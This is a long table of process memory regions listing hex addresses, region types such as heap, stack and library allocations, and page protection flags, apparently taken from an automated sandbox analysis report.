|
1CC0000
|
heap
|
page read and write
|
||
|
1AE0000
|
trusted library allocation
|
page read and write
|
||
|
37D8000
|
heap
|
page read and write
|
||
|
434E000
|
stack
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
22E000
|
heap
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
3C00000
|
trusted library allocation
|
page read and write
|
||
|
42F000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
2E1A000
|
stack
|
page read and write
|
||
|
1CD8000
|
heap
|
page execute and read and write
|
||
|
7FE89BF6000
|
trusted library allocation
|
page read and write
|
||
|
2EB0000
|
remote allocation
|
page read and write
|
||
|
1C45C000
|
stack
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
4E4C000
|
heap
|
page read and write
|
||
|
3825000
|
heap
|
page read and write
|
||
|
1C150000
|
heap
|
page read and write
|
||
|
4A7000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
2EB0000
|
remote allocation
|
page read and write
|
||
|
4C94000
|
heap
|
page read and write
|
||
|
2281000
|
trusted library allocation
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
3C7000
|
heap
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
1E35000
|
heap
|
page read and write
|
||
|
4E58000
|
heap
|
page read and write
|
||
|
3468000
|
trusted library allocation
|
page read and write
|
||
|
3801000
|
heap
|
page read and write
|
||
|
532000
|
heap
|
page read and write
|
||
|
4F0E000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
3861000
|
heap
|
page read and write
|
||
|
46B000
|
heap
|
page read and write
|
||
|
3C8000
|
heap
|
page read and write
|
||
|
37EB000
|
heap
|
page read and write
|
||
|
536000
|
heap
|
page read and write
|
||
|
4EE5000
|
heap
|
page read and write
|
||
|
37F8000
|
heap
|
page read and write
|
||
|
36D000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
361000
|
heap
|
page read and write
|
||
|
7FE89BFA000
|
trusted library allocation
|
page read and write
|
||
|
A80000
|
direct allocation
|
page execute and read and write
|
||
|
4F3A000
|
heap
|
page read and write
|
||
|
35E0000
|
heap
|
page read and write
|
||
|
1A73F000
|
heap
|
page read and write
|
||
|
2C3000
|
heap
|
page read and write
|
||
|
206000
|
heap
|
page read and write
|
||
|
492000
|
heap
|
page read and write
|
||
|
110000
|
heap
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
1DF0000
|
direct allocation
|
page read and write
|
||
|
3FD0000
|
trusted library allocation
|
page read and write
|
||
|
4F12000
|
heap
|
page read and write
|
||
|
1A706000
|
heap
|
page read and write
|
||
|
4EE5000
|
heap
|
page read and write
|
||
|
4EE0000
|
heap
|
page read and write
|
||
|
3ABC000
|
stack
|
page read and write
|
||
|
283000
|
stack
|
page read and write
|
||
|
2006000
|
heap
|
page read and write
|
||
|
7FE89A62000
|
trusted library allocation
|
page read and write
|
||
|
2050000
|
heap
|
page read and write
|
||
|
1A7A8000
|
heap
|
page read and write
|
||
|
4B1D000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
1A7E8000
|
heap
|
page read and write
|
||
|
319000
|
heap
|
page read and write
|
||
|
27A4000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BFD000
|
trusted library allocation
|
page read and write
|
||
|
1FD0000
|
heap
|
page read and write
|
||
|
1D70000
|
heap
|
page execute and read and write
|
||
|
291000
|
heap
|
page read and write
|
||
|
4E56000
|
heap
|
page read and write
|
||
|
B0000
|
heap
|
page read and write
|
||
|
39D000
|
heap
|
page read and write
|
||
|
333E000
|
trusted library allocation
|
page read and write
|
||
|
3FDA000
|
trusted library allocation
|
page read and write
|
||
|
3C7000
|
heap
|
page read and write
|
||
|
1B11B000
|
stack
|
page read and write
|
||
|
5DB000
|
direct allocation
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
37A4000
|
heap
|
page read and write
|
||
|
37D9000
|
heap
|
page read and write
|
||
|
3825000
|
heap
|
page read and write
|
||
|
4C95000
|
heap
|
page read and write
|
||
|
3616000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
1C58E000
|
stack
|
page read and write
|
||
|
B70000
|
direct allocation
|
page execute and read and write
|
||
|
1C7FF000
|
stack
|
page read and write
|
||
|
4F14000
|
heap
|
page read and write
|
||
|
3AC0000
|
trusted library allocation
|
page read and write
|
||
|
A4000
|
heap
|
page read and write
|
||
|
49E1000
|
heap
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
499A000
|
heap
|
page read and write
|
||
|
3C00000
|
trusted library allocation
|
page read and write
|
||
|
3861000
|
heap
|
page read and write
|
||
|
4C8000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2C3000
|
heap
|
page read and write
|
||
|
347F000
|
trusted library allocation
|
page read and write
|
||
|
1A5FF000
|
stack
|
page read and write
|
||
|
1A7A1000
|
heap
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
4DA000
|
heap
|
page read and write
|
||
|
7FE89890000
|
trusted library allocation
|
page read and write
|
||
|
1E43000
|
direct allocation
|
page read and write
|
||
|
4C21000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
3FD8000
|
trusted library allocation
|
page read and write
|
||
|
24BD000
|
trusted library allocation
|
page read and write
|
||
|
6AC1000
|
trusted library allocation
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
3870000
|
heap
|
page read and write
|
||
|
326000
|
heap
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
4F12000
|
heap
|
page read and write
|
||
|
4DF000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3FF1000
|
trusted library allocation
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
1C590000
|
heap
|
page read and write
|
||
|
459000
|
heap
|
page read and write
|
||
|
4B4000
|
heap
|
page read and write
|
||
|
183000
|
heap
|
page read and write
|
||
|
3875000
|
heap
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
441000
|
heap
|
page read and write
|
||
|
1BF8F000
|
stack
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
24A5000
|
trusted library allocation
|
page read and write
|
||
|
4F14000
|
heap
|
page read and write
|
||
|
1A77D000
|
heap
|
page read and write
|
||
|
1AF96000
|
heap
|
page read and write
|
||
|
1E50000
|
heap
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page read and write
|
||
|
4E4C000
|
heap
|
page read and write
|
||
|
1AF5E000
|
stack
|
page read and write
|
||
|
361000
|
heap
|
page read and write
|
||
|
4F0D000
|
heap
|
page read and write
|
||
|
12291000
|
trusted library allocation
|
page read and write
|
||
|
4F16000
|
heap
|
page read and write
|
||
|
7FE89A33000
|
trusted library allocation
|
page read and write
|
||
|
4E56000
|
heap
|
page read and write
|
||
|
3869000
|
heap
|
page read and write
|
||
|
3744000
|
trusted library allocation
|
page read and write
|
||
|
1B2AF000
|
stack
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
7FE89940000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F14000
|
heap
|
page read and write
|
||
|
165000
|
stack
|
page read and write
|
||
|
4C73000
|
heap
|
page read and write
|
||
|
4C21000
|
heap
|
page read and write
|
||
|
404000
|
heap
|
page read and write
|
||
|
5C7000
|
direct allocation
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
2AB000
|
stack
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
22DE000
|
trusted library allocation
|
page read and write
|
||
|
2AF0000
|
trusted library allocation
|
page execute read
|
||
|
2A44000
|
heap
|
page read and write
|
||
|
38C000
|
heap
|
page read and write
|
||
|
3825000
|
heap
|
page read and write
|
||
|
1C13C000
|
heap
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
88C1000
|
trusted library allocation
|
page read and write
|
||
|
1FC0000
|
heap
|
page read and write
|
||
|
4F14000
|
heap
|
page read and write
|
||
|
4F3A000
|
heap
|
page read and write
|
||
|
A9000
|
heap
|
page read and write
|
||
|
3C9000
|
heap
|
page read and write
|
||
|
536000
|
heap
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
24B0000
|
trusted library allocation
|
page read and write
|
||
|
49E1000
|
heap
|
page read and write
|
||
|
3E50000
|
trusted library allocation
|
page read and write
|
||
|
27E000
|
heap
|
page read and write
|
||
|
46A000
|
heap
|
page read and write
|
||
|
24C1000
|
trusted library allocation
|
page read and write
|
||
|
3C40000
|
trusted library allocation
|
page read and write
|
||
|
4ED000
|
heap
|
page read and write
|
||
|
3342000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
4F23000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
3C00000
|
trusted library allocation
|
page read and write
|
||
|
367000
|
heap
|
page read and write
|
||
|
5360000
|
trusted library allocation
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3869000
|
heap
|
page read and write
|
||
|
3EC000
|
heap
|
page read and write
|
||
|
291000
|
heap
|
page read and write
|
||
|
367000
|
heap
|
page read and write
|
||
|
354000
|
heap
|
page read and write
|
||
|
461000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
3331000
|
trusted library allocation
|
page read and write
|
||
|
4A55000
|
heap
|
page read and write
|
||
|
1AF000
|
heap
|
page read and write
|
||
|
3A7D000
|
stack
|
page read and write
|
||
|
60C1000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
4F12000
|
heap
|
page read and write
|
||
|
3CE000
|
heap
|
page read and write
|
||
|
1A747000
|
heap
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
4F23000
|
heap
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
38C1000
|
trusted library allocation
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
3856000
|
heap
|
page read and write
|
||
|
119000
|
heap
|
page read and write
|
||
|
3960000
|
trusted library allocation
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
1A74A000
|
heap
|
page read and write
|
||
|
181000
|
heap
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
7FE8988D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3869000
|
heap
|
page read and write
|
||
|
B74000
|
direct allocation
|
page execute and read and write
|
||
|
7FE89BC3000
|
trusted library allocation
|
page read and write
|
||
|
380B000
|
heap
|
page read and write
|
||
|
4A55000
|
heap
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
473000
|
heap
|
page read and write
|
||
|
CF4000
|
direct allocation
|
page execute and read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
2125000
|
trusted library allocation
|
page read and write
|
||
|
29A000
|
heap
|
page read and write
|
||
|
1B099000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
4F23000
|
heap
|
page read and write
|
||
|
4ED8000
|
heap
|
page read and write
|
||
|
49E1000
|
heap
|
page read and write
|
||
|
1DD0000
|
direct allocation
|
page read and write
|
||
|
536000
|
heap
|
page read and write
|
||
|
7FE899A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89C18000
|
trusted library allocation
|
page read and write
|
||
|
314000
|
heap
|
page read and write
|
||
|
1C34A000
|
stack
|
page read and write
|
||
|
36D000
|
heap
|
page read and write
|
||
|
4EDA000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
1A700000
|
heap
|
page read and write
|
||
|
14D000
|
stack
|
page read and write
|
||
|
B77000
|
direct allocation
|
page execute and read and write
|
||
|
4F2D000
|
heap
|
page read and write
|
||
|
2E6000
|
heap
|
page read and write
|
||
|
1E37000
|
direct allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
49E2000
|
heap
|
page read and write
|
||
|
499A000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
4C94000
|
heap
|
page read and write
|
||
|
5A4000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
473000
|
heap
|
page read and write
|
||
|
7FE89936000
|
trusted library allocation
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
7FE89893000
|
trusted library allocation
|
page read and write
|
||
|
51E000
|
heap
|
page read and write
|
||
|
1B090000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
1A7FA000
|
heap
|
page read and write
|
||
|
1B76000
|
heap
|
page read and write
|
||
|
3800000
|
heap
|
page read and write
|
||
|
311000
|
heap
|
page read and write
|
||
|
342000
|
heap
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
339000
|
heap
|
page read and write
|
||
|
1A745000
|
heap
|
page read and write
|
||
|
5360000
|
trusted library allocation
|
page read and write
|
||
|
46B000
|
heap
|
page read and write
|
||
|
7FE89A3C000
|
trusted library allocation
|
page read and write
|
||
|
2C3000
|
heap
|
page read and write
|
||
|
1E2F000
|
stack
|
page read and write
|
||
|
1A742000
|
heap
|
page read and write
|
||
|
3876000
|
heap
|
page read and write
|
||
|
1C3DC000
|
stack
|
page read and write
|
||
|
4E8F000
|
heap
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
54D0000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3465000
|
trusted library allocation
|
page read and write
|
||
|
1BD0000
|
heap
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
536000
|
heap
|
page read and write
|
||
|
3827000
|
heap
|
page read and write
|
||
|
386B000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
1BE5E000
|
stack
|
page read and write
|
||
|
174000
|
heap
|
page read and write
|
||
|
4EE3000
|
heap
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
386B000
|
heap
|
page read and write
|
||
|
1B00000
|
trusted library allocation
|
page read and write
|
||
|
385A000
|
heap
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
4C94000
|
heap
|
page read and write
|
||
|
1BF0B000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
4AC5000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
|
4EC7000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FE89A64000
|
trusted library allocation
|
page read and write
|
||
|
3861000
|
heap
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
3A7000
|
heap
|
page read and write
|
||
|
7FE8993C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3825000
|
heap
|
page read and write
|
||
|
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
2EC1000
|
trusted library allocation
|
page read and write
|
||
|
2484000
|
trusted library allocation
|
page read and write
|
||
|
1228F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
1B390000
|
heap
|
page read and write
|
||
|
5360000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
1BED0000
|
heap
|
page read and write
|
||
|
3BF0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89882000
|
trusted library allocation
|
page read and write
|
||
|
333B000
|
trusted library allocation
|
page read and write
|
||
|
1A756000
|
heap
|
page read and write
|
||
|
3FA0000
|
trusted library allocation
|
page read and write
|
||
|
38E0000
|
heap
|
page read and write
|
||
|
1A450000
|
heap
|
page execute and read and write
|
||
|
394000
|
heap
|
page read and write
|
||
|
45E000
|
heap
|
page read and write
|
||
|
3FF4000
|
trusted library allocation
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
5DF000
|
direct allocation
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
4CA000
|
heap
|
page read and write
|
||
|
D70000
|
direct allocation
|
page execute and read and write
|
||
|
499A000
|
heap
|
page read and write
|
||
|
3C84000
|
heap
|
page read and write
|
||
|
3FFA000
|
trusted library allocation
|
page read and write
|
||
|
1C040000
|
heap
|
page read and write
|
||
|
391000
|
heap
|
page read and write
|
||
|
123E6000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A20000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A37000
|
trusted library allocation
|
page read and write
|
||
|
1C1A5000
|
heap
|
page read and write
|
||
|
1A69B000
|
stack
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
37DA000
|
heap
|
page read and write
|
||
|
4E6000
|
heap
|
page read and write
|
||
|
4FE000
|
heap
|
page read and write
|
||
|
35DF000
|
stack
|
page read and write
|
||
|
4F3A000
|
heap
|
page read and write
|
||
|
4CC1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
4F0A000
|
heap
|
page read and write
|
||
|
38C000
|
heap
|
page read and write
|
||
|
BA000
|
heap
|
page read and write
|
||
|
4D7000
|
heap
|
page read and write
|
||
|
1C064000
|
heap
|
page read and write
|
||
|
1E30000
|
direct allocation
|
page read and write
|
||
|
3C80000
|
heap
|
page read and write
|
||
|
2060000
|
heap
|
page read and write
|
||
|
21F9000
|
stack
|
page read and write
|
||
|
3710000
|
trusted library allocation
|
page execute
|
||
|
1AA08000
|
stack
|
page read and write
|
||
|
3855000
|
heap
|
page read and write
|
||
|
345C000
|
stack
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
1C109000
|
heap
|
page read and write
|
||
|
38C000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
2E8000
|
heap
|
page read and write
|
||
|
1C094000
|
heap
|
page read and write
|
||
|
1A958000
|
stack
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
3F6F000
|
stack
|
page read and write
|
||
|
39E000
|
heap
|
page read and write
|
||
|
4998000
|
heap
|
page read and write
|
||
|
37B0000
|
heap
|
page read and write
|
||
|
B60000
|
direct allocation
|
page execute and read and write
|
||
|
34BF000
|
trusted library allocation
|
page read and write
|
||
|
35FE000
|
stack
|
page read and write
|
||
|
4CD000
|
heap
|
page read and write
|
||
|
1C06000
|
heap
|
page read and write
|
||
|
4EE3000
|
heap
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
4F39000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
386B000
|
heap
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
1A458000
|
heap
|
page execute and read and write
|
||
|
3855000
|
heap
|
page read and write
|
||
|
1CC000
|
stack
|
page read and write
|
||
|
3897000
|
heap
|
page read and write
|
||
|
1E43000
|
direct allocation
|
page read and write
|
||
|
3836000
|
heap
|
page read and write
|
||
|
37DA000
|
heap
|
page read and write
|
||
|
74C1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A88000
|
trusted library allocation
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
4E4A000
|
heap
|
page read and write
|
||
|
37F8000
|
heap
|
page read and write
|
||
|
4F3D000
|
heap
|
page read and write
|
||
|
C00000
|
direct allocation
|
page execute and read and write
|
||
|
1A280000
|
heap
|
page read and write
|
||
|
4000000
|
trusted library allocation
|
page read and write
|
||
|
4B1D000
|
heap
|
page read and write
|
||
|
37DC000
|
heap
|
page read and write
|
||
|
1E6B000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
3C3000
|
heap
|
page read and write
|
||
|
54D9000
|
heap
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
109000
|
heap
|
page read and write
|
||
|
6F5000
|
heap
|
page read and write
|
||
|
4F1000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
4B1D000
|
heap
|
page read and write
|
||
|
7FE8989B000
|
trusted library allocation
|
page read and write
|
||
|
1C107000
|
heap
|
page read and write
|
||
|
9CC1000
|
trusted library allocation
|
page read and write
|
||
|
4F38000
|
heap
|
page read and write
|
||
|
7FE89930000
|
trusted library allocation
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
386C000
|
heap
|
page read and write
|
||
|
12281000
|
trusted library allocation
|
page read and write
|
||
|
37EB000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
3861000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
380F000
|
heap
|
page read and write
|
||
|
1CD0000
|
heap
|
page execute and read and write
|
||
|
3BEF000
|
stack
|
page read and write
|
||
|
1C173000
|
heap
|
page read and write
|
||
|
38A0000
|
trusted library allocation
|
page read and write
|
||
|
487000
|
heap
|
page read and write
|
||
|
4C94000
|
heap
|
page read and write
|
||
|
1E10000
|
direct allocation
|
page read and write
|
||
|
4F3C000
|
heap
|
page read and write
|
||
|
1A40B000
|
stack
|
page read and write
|
||
|
4F3D000
|
heap
|
page read and write
|
||
|
4F3A000
|
heap
|
page read and write
|
||
|
3E95000
|
trusted library allocation
|
page read and write
|
||
|
1DB0000
|
direct allocation
|
page read and write
|
||
|
4C74000
|
heap
|
page read and write
|
||
|
4A56000
|
heap
|
page read and write
|
||
|
2E8000
|
heap
|
page read and write
|
||
|
3C4000
|
heap
|
page read and write
|
||
|
4EE7000
|
heap
|
page read and write
|
||
|
7FE89B75000
|
trusted library allocation
|
page read and write
|
||
|
4F14000
|
heap
|
page read and write
|
||
|
3837000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
501000
|
heap
|
page read and write
|
||
|
3C7000
|
heap
|
page read and write
|
||
|
4EE0000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
40D000
|
heap
|
page read and write
|
||
|
2EE000
|
heap
|
page read and write
|
||
|
1CD4000
|
heap
|
page execute and read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
3BFA000
|
stack
|
page read and write
|
||
|
1F6E000
|
stack
|
page read and write | page guard
|
||
|
31A4000
|
trusted library allocation
|
page read and write
|
||
|
49E1000
|
heap
|
page read and write
|
||
|
216F000
|
stack
|
page read and write
|
||
|
2BCB000
|
heap
|
page read and write
|
||
|
1AE40000
|
heap
|
page read and write
|
||
|
4B1F000
|
heap
|
page read and write
|
||
|
1A48E000
|
heap
|
page execute and read and write
|
||
|
1F6F000
|
stack
|
page read and write
|
||
|
7FE898DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
3AD000
|
stack
|
page read and write
|
||
|
7FE89BE9000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
42E000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
4AD000
|
heap
|
page read and write
|
||
|
600000
|
direct allocation
|
page read and write
|
||
|
412C000
|
stack
|
page read and write
|
||
|
499000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
4F9000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
5DD000
|
direct allocation
|
page read and write
|
||
|
3E3F000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5E0000
|
direct allocation
|
page read and write
|
||
|
1BED5000
|
heap
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
1AD000
|
heap
|
page read and write
|
||
|
3862000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
37A0000
|
heap
|
page read and write
|
||
|
20E0000
|
trusted library allocation
|
page read and write
|
||
|
BE0000
|
direct allocation
|
page execute and read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
5C0000
|
direct allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
37D4000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
|
3E40000
|
heap
|
page read and write
|
||
|
A0000
|
heap
|
page read and write
|
||
|
3810000
|
trusted library allocation
|
page read and write
|
||
|
1A57A000
|
stack
|
page read and write
|
||
|
37A0000
|
heap
|
page read and write
|
||
|
4EE9000
|
heap
|
page read and write
|
||
|
273E000
|
trusted library allocation
|
page read and write
|
||
|
7FE89CA0000
|
trusted library allocation
|
page read and write
|
||
|
45D000
|
heap
|
page read and write
|
||
|
1BC0000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
3C7000
|
heap
|
page read and write
|
||
|
3BC000
|
heap
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
2A6000
|
stack
|
page read and write
|
||
|
3337000
|
trusted library allocation
|
page read and write
|
||
|
4992000
|
heap
|
page read and write
|
||
|
4F16000
|
heap
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
|
1C03D000
|
stack
|
page read and write
|
||
|
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
|
1C141000
|
heap
|
page read and write
|
||
|
397000
|
heap
|
page read and write
|
||
|
1C068000
|
heap
|
page read and write
|
||
|
49E1000
|
heap
|
page read and write
|
||
|
362000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
7EC1000
|
trusted library allocation
|
page read and write
|
||
|
1C71E000
|
stack
|
page read and write
|
||
|
4EE3000
|
heap
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
4F2D000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1E37000
|
direct allocation
|
page read and write
|
||
|
6D7000
|
heap
|
page read and write
|
||
|
52F000
|
heap
|
page read and write
|
||
|
3CE000
|
heap
|
page read and write
|
||
|
3897000
|
heap
|
page read and write
|
||
|
200F000
|
stack
|
page read and write
|
||
|
4EE5000
|
heap
|
page read and write
|
||
|
2FCF000
|
stack
|
page read and write
|
||
|
1C4EF000
|
stack
|
page read and write
|
||
|
2E1000
|
heap
|
page read and write
|
||
|
3FD3000
|
trusted library allocation
|
page read and write
|
||
|
3F9B000
|
stack
|
page read and write
|
||
|
4ED000
|
heap
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
536000
|
heap
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
7FE89BE4000
|
trusted library allocation
|
page read and write
|
||
|
291000
|
heap
|
page read and write
|
||
|
3475000
|
trusted library allocation
|
page read and write
|
||
|
37FB000
|
heap
|
page read and write
|
||
|
1B094000
|
heap
|
page read and write
|
||
|
7FE89884000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
54D5000
|
heap
|
page read and write
|
||
|
5C3000
|
direct allocation
|
page read and write
|
||
|
4F23000
|
heap
|
page read and write
|
||
|
3827000
|
heap
|
page read and write
|
||
|
34A000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
1B40000
|
heap
|
page read and write
|
||
|
4C6000
|
heap
|
page read and write
|
||
|
3869000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
